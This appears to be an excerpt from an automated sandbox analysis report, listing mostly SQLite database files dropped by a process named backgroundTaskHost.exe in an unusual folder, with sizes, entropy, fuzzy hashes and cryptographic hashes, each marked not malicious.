                                                                                          MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                          SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                          SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                          SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                          Malicious:false
                                                                                          Process:C:\ChainbrowserNet\backgroundTaskHost.exe
                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                                          Category:dropped
                                                                                          Size (bytes):20480
                                                                                          Entropy (8bit):0.5712781801655107
                                                                                          Encrypted:false
                                                                                          SSDEEP:12:TLVNFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TL1F1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                                          MD5:05A60B4620923FD5D53B9204391452AF
                                                                                          SHA1:DC12F90925033F25C70A720E01D5F8666D0B46E4
                                                                                          SHA-256:6F1CA729609806AF88218D0A35C3B9E34252900341A0E15D71F7F9199E422E13
                                                                                          SHA-512:068A954C0C7A68E603D72032A447E7652B1E9CED5522562FBCBD9EC0A5D2D943701100049FA0A750E71C4D3D84210B48D10855E7CC60919E04ED884983D3C3D6
                                                                                          Malicious:false
                                                                                          Process:C:\ChainbrowserNet\backgroundTaskHost.exe
                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                          Category:dropped
                                                                                          Size (bytes):40960
                                                                                          Entropy (8bit):0.8553638852307782
                                                                                          Encrypted:false
                                                                                          SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                          MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                          SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                          SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                          SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                          Malicious:false
                                                                                          Process:C:\ChainbrowserNet\backgroundTaskHost.exe
                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                                          Category:dropped
                                                                                          Size (bytes):49152
                                                                                          Entropy (8bit):0.8180424350137764
                                                                                          Encrypted:false
                                                                                          SSDEEP:96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
                                                                                          MD5:349E6EB110E34A08924D92F6B334801D
                                                                                          SHA1:BDFB289DAFF51890CC71697B6322AA4B35EC9169
                                                                                          SHA-256:C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
                                                                                          SHA-512:2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
                                                                                          Malicious:false
                                                                                          Process:C:\ChainbrowserNet\backgroundTaskHost.exe
                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3039003, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                                          Category:dropped
                                                                                          Size (bytes):20480
                                                                                          Entropy (8bit):0.5707520969659783
                                                                                          Encrypted:false
                                                                                          SSDEEP:12:TLVlFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TLxF1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                                          MD5:9F6D153D934BCC50E8BC57E7014B201A
                                                                                          SHA1:50B3F813A1A8186DE3F6E9791EC41D95A8DC205D
                                                                                          SHA-256:2A7FC7F64938AD07F7249EC0BED6F48BC5302EA84FE9E61E276436EA942BA230
                                                                                          SHA-512:B8CA2DCB8D62A0B2ED8795C3F67E4698F3BCB208C26FBD8BA9FD4DA82269E6DE9C5759F27F28DC108677DDEBBAC96D60C4ED2E64C90D51DB5B0F70331185B33F
                                                                                          Malicious:false
                                                                                          Process:C:\ChainbrowserNet\backgroundTaskHost.exe
                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                          Category:dropped
                                                                                          Size (bytes):114688
                                                                                          Entropy (8bit):0.9746603542602881
                                                                                          Encrypted:false
                                                                                          SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                          MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                          SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                          SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                          SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                          Malicious:false
                                                                                          Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                          Process:C:\ChainbrowserNet\backgroundTaskHost.exe
                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                          Category:dropped
                                                                                          Size (bytes):114688
                                                                                          Entropy (8bit):0.9746603542602881
                                                                                          Encrypted:false
                                                                                          SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                          MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                          SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                          SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                          SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                          Malicious:false
                                                                                          Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                          Process:C:\ChainbrowserNet\backgroundTaskHost.exe
                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                          Category:dropped
                                                                                          Size (bytes):114688
                                                                                          Entropy (8bit):0.9746603542602881
                                                                                          Encrypted:false
                                                                                          SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                          MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                          SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                          SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                          SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                          Malicious:false
                                                                                          Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                          Process:C:\ChainbrowserNet\backgroundTaskHost.exe
                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                          Category:dropped
                                                                                          Size (bytes):114688
                                                                                          Entropy (8bit):0.9746603542602881
                                                                                          Encrypted:false
                                                                                          SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                          MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                          SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                          SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                          SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                          Malicious:false
                                                                                          Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                          Process:C:\ChainbrowserNet\backgroundTaskHost.exe
                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                                          Category:dropped
                                                                                          Size (bytes):49152
                                                                                          Entropy (8bit):0.8180424350137764
                                                                                          Encrypted:false
                                                                                          SSDEEP:96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
                                                                                          MD5:349E6EB110E34A08924D92F6B334801D
                                                                                          SHA1:BDFB289DAFF51890CC71697B6322AA4B35EC9169
                                                                                          SHA-256:C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
                                                                                          SHA-512:2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
                                                                                          Malicious:false
                                                                                          Process:C:\ChainbrowserNet\backgroundTaskHost.exe
                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                                          Category:dropped
                                                                                          Size (bytes):49152
                                                                                          Entropy (8bit):0.8180424350137764
                                                                                          Encrypted:false
                                                                                          SSDEEP:96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
                                                                                          MD5:349E6EB110E34A08924D92F6B334801D
                                                                                          SHA1:BDFB289DAFF51890CC71697B6322AA4B35EC9169
                                                                                          SHA-256:C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
                                                                                          SHA-512:2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
                                                                                          Malicious:false
                                                                                          Process:C:\ChainbrowserNet\backgroundTaskHost.exe
                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                          Category:dropped
                                                                                          Size (bytes):106496
                                                                                          Entropy (8bit):1.1358696453229276
                                                                                          Encrypted:false
                                                                                          SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                                          MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                                          SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                                          SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                                          SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                                          Malicious:false
                                                                                          Process:C:\ChainbrowserNet\backgroundTaskHost.exe
                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                          Category:dropped
                                                                                          Size (bytes):106496
                                                                                          Entropy (8bit):1.1358696453229276
                                                                                          Encrypted:false
                                                                                          SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                                          MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                                          SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                                          SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                                          SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                                          Malicious:false
                                                                                          Process:C:\ChainbrowserNet\backgroundTaskHost.exe
                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3039003, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                                          Category:dropped
                                                                                          Size (bytes):20480
                                                                                          Entropy (8bit):0.5707520969659783
                                                                                          Encrypted:false
                                                                                          SSDEEP:12:TLVlFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TLxF1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                                          MD5:9F6D153D934BCC50E8BC57E7014B201A
                                                                                          SHA1:50B3F813A1A8186DE3F6E9791EC41D95A8DC205D
                                                                                          SHA-256:2A7FC7F64938AD07F7249EC0BED6F48BC5302EA84FE9E61E276436EA942BA230
                                                                                          SHA-512:B8CA2DCB8D62A0B2ED8795C3F67E4698F3BCB208C26FBD8BA9FD4DA82269E6DE9C5759F27F28DC108677DDEBBAC96D60C4ED2E64C90D51DB5B0F70331185B33F
                                                                                          Malicious:false
                                                                                          Process:C:\ChainbrowserNet\backgroundTaskHost.exe
                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                          Category:dropped
                                                                                          Size (bytes):114688
                                                                                          Entropy (8bit):0.9746603542602881
                                                                                          Encrypted:false
                                                                                          SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                          MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                          SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                          SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                          SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                          Malicious:false
                                                                                          Process:C:\ChainbrowserNet\backgroundTaskHost.exe
                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                          Category:dropped
                                                                                          Size (bytes):114688
                                                                                          Entropy (8bit):0.9746603542602881
                                                                                          Encrypted:false
                                                                                          SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                          MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                          SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                          SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                          SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                          Malicious:false
                                                                                          Process:C:\ChainbrowserNet\backgroundTaskHost.exe
                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                                          Category:dropped
                                                                                          Size (bytes):20480
                                                                                          Entropy (8bit):0.5712781801655107
                                                                                          Encrypted:false
                                                                                          SSDEEP:12:TLVNFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TL1F1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                                          MD5:05A60B4620923FD5D53B9204391452AF
                                                                                          SHA1:DC12F90925033F25C70A720E01D5F8666D0B46E4
                                                                                          SHA-256:6F1CA729609806AF88218D0A35C3B9E34252900341A0E15D71F7F9199E422E13
                                                                                          SHA-512:068A954C0C7A68E603D72032A447E7652B1E9CED5522562FBCBD9EC0A5D2D943701100049FA0A750E71C4D3D84210B48D10855E7CC60919E04ED884983D3C3D6
                                                                                          Malicious:false
                                                                                          Process:C:\ChainbrowserNet\backgroundTaskHost.exe
                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 11, database pages 7, cookie 0x3, schema 4, UTF-8, version-valid-for 11
                                                                                          Category:dropped
                                                                                          Size (bytes):28672
                                                                                          Entropy (8bit):2.5793180405395284
                                                                                          Encrypted:false
                                                                                          SSDEEP:96:/xealJiylsMjLslk5nYPphZEhcR2hO2mOeVgN8tmKqWkh3qzRk4PeOhZ3hcR1hOI:/xGZR8wbtxq5uWRHKloIN7YItnb6Ggz
                                                                                          MD5:41EA9A4112F057AE6BA17E2838AEAC26
                                                                                          SHA1:F2B389103BFD1A1A050C4857A995B09FEAFE8903
                                                                                          SHA-256:CE84656EAEFC842355D668E7141F84383D3A0C819AE01B26A04F9021EF0AC9DB
                                                                                          SHA-512:29E848AD16D458F81D8C4F4E288094B4CFC103AD99B4511ED1A4846542F9128736A87AAC5F4BFFBEFE7DF99A05EB230911EDCE99FEE3877DEC130C2781962103
                                                                                          Malicious:false
                                                                                          Process:C:\ChainbrowserNet\backgroundTaskHost.exe
                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 11, database pages 7, cookie 0x3, schema 4, UTF-8, version-valid-for 11
                                                                                          Category:dropped
                                                                                          Size (bytes):28672
                                                                                          Entropy (8bit):2.5793180405395284
                                                                                          Encrypted:false
                                                                                          SSDEEP:96:/xealJiylsMjLslk5nYPphZEhcR2hO2mOeVgN8tmKqWkh3qzRk4PeOhZ3hcR1hOI:/xGZR8wbtxq5uWRHKloIN7YItnb6Ggz
                                                                                          MD5:41EA9A4112F057AE6BA17E2838AEAC26
                                                                                          SHA1:F2B389103BFD1A1A050C4857A995B09FEAFE8903
                                                                                          SHA-256:CE84656EAEFC842355D668E7141F84383D3A0C819AE01B26A04F9021EF0AC9DB
                                                                                          SHA-512:29E848AD16D458F81D8C4F4E288094B4CFC103AD99B4511ED1A4846542F9128736A87AAC5F4BFFBEFE7DF99A05EB230911EDCE99FEE3877DEC130C2781962103
                                                                                          Malicious:false
                                                                                          Process:C:\ChainbrowserNet\backgroundTaskHost.exe
                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                          Category:dropped
                                                                                          Size (bytes):40960
                                                                                          Entropy (8bit):0.8553638852307782
                                                                                          Encrypted:false
                                                                                          SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                          MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                          SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                          SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                          SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                          Malicious:false
                                                                                          Process:C:\ChainbrowserNet\backgroundTaskHost.exe
                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                                          Category:dropped
                                                                                          Size (bytes):20480
                                                                                          Entropy (8bit):0.5712781801655107
                                                                                          Encrypted:false
                                                                                          SSDEEP:12:TLVNFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TL1F1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                                          MD5:05A60B4620923FD5D53B9204391452AF
                                                                                          SHA1:DC12F90925033F25C70A720E01D5F8666D0B46E4
                                                                                          SHA-256:6F1CA729609806AF88218D0A35C3B9E34252900341A0E15D71F7F9199E422E13
                                                                                          SHA-512:068A954C0C7A68E603D72032A447E7652B1E9CED5522562FBCBD9EC0A5D2D943701100049FA0A750E71C4D3D84210B48D10855E7CC60919E04ED884983D3C3D6
                                                                                          Malicious:false
                                                                                          Process:C:\ChainbrowserNet\backgroundTaskHost.exe
                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                          Category:dropped
                                                                                          Size (bytes):114688
                                                                                          Entropy (8bit):0.9746603542602881
                                                                                          Encrypted:false
                                                                                          SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                          MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                          SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                          SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                          SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                          Malicious:false
                                                                                          Process:C:\ChainbrowserNet\backgroundTaskHost.exe
                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3039003, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                                          Category:dropped
                                                                                          Size (bytes):20480
                                                                                          Entropy (8bit):0.5707520969659783
                                                                                          Encrypted:false
                                                                                          SSDEEP:12:TLVlFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TLxF1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                                          MD5:9F6D153D934BCC50E8BC57E7014B201A
                                                                                          SHA1:50B3F813A1A8186DE3F6E9791EC41D95A8DC205D
                                                                                          SHA-256:2A7FC7F64938AD07F7249EC0BED6F48BC5302EA84FE9E61E276436EA942BA230
                                                                                          SHA-512:B8CA2DCB8D62A0B2ED8795C3F67E4698F3BCB208C26FBD8BA9FD4DA82269E6DE9C5759F27F28DC108677DDEBBAC96D60C4ED2E64C90D51DB5B0F70331185B33F
                                                                                          Malicious:false
                                                                                          Process:C:\ChainbrowserNet\backgroundTaskHost.exe
                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                          Category:dropped
                                                                                          Size (bytes):106496
                                                                                          Entropy (8bit):1.1358696453229276
                                                                                          Encrypted:false
                                                                                          SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                                          MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                                          SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                                          SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                                          SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                                          Malicious:false
                                                                                          Process:C:\ChainbrowserNet\backgroundTaskHost.exe
                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                          Category:dropped
                                                                                          Size (bytes):106496
                                                                                          Entropy (8bit):1.1358696453229276
                                                                                          Encrypted:false
                                                                                          SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                                          MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                                          SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                                          SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                                          SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                                          Malicious:false
                                                                                          Process:C:\ChainbrowserNet\backgroundTaskHost.exe
                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                          Category:dropped
                                                                                          Size (bytes):106496
                                                                                          Entropy (8bit):1.1358696453229276
                                                                                          Encrypted:false
                                                                                          SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                                          MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                                          SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                                          SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                                          SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                                          Malicious:false
                                                                                          Process:C:\ChainbrowserNet\backgroundTaskHost.exe
                                                                                          File Type:ASCII text, with no line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):25
                                                                                          Entropy (8bit):4.403856189774723
                                                                                          Encrypted:false
                                                                                          SSDEEP:3:aGQRWct9TRia:aGQRZ1L
                                                                                          MD5:5FC2C990D1AB70BD7E657952E59DEDB3
                                                                                          SHA1:43319611F98B7B030B1D69F5F2377FFBFB09783C
                                                                                          SHA-256:6EF1D069DA0E35D6DDF94939E06A52B1380C4D6B96A7C031F2552C3D21CC7127
                                                                                          SHA-512:EC718509289DCF6E3D5EB14EC2695BDDFF7ECB15865E86D37D1030E8AA8D926FACD5958DA3D046D0A54066EA3CD8382C099417453BFFB94B905ECAE7F276B044
                                                                                          Malicious:false
                                                                                          Preview:s8cSR6x3rix3o7WXvwG8EhBVa
                                                                                          Process:C:\ChainbrowserNet\backgroundTaskHost.exe
                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                          Category:dropped
                                                                                          Size (bytes):114688
                                                                                          Entropy (8bit):0.9746603542602881
                                                                                          Encrypted:false
                                                                                          SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                          MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                          SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                          SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                          SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                          Malicious:false
                                                                                          Process:C:\ChainbrowserNet\backgroundTaskHost.exe
                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                          Category:dropped
                                                                                          Size (bytes):40960
                                                                                          Entropy (8bit):0.8553638852307782
                                                                                          Encrypted:false
                                                                                          SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                          MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                          SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                          SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                          SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                          Malicious:false
                                                                                          Process:C:\ChainbrowserNet\backgroundTaskHost.exe
                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                                          Category:dropped
                                                                                          Size (bytes):49152
                                                                                          Entropy (8bit):0.8180424350137764
                                                                                          Encrypted:false
                                                                                          SSDEEP:96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
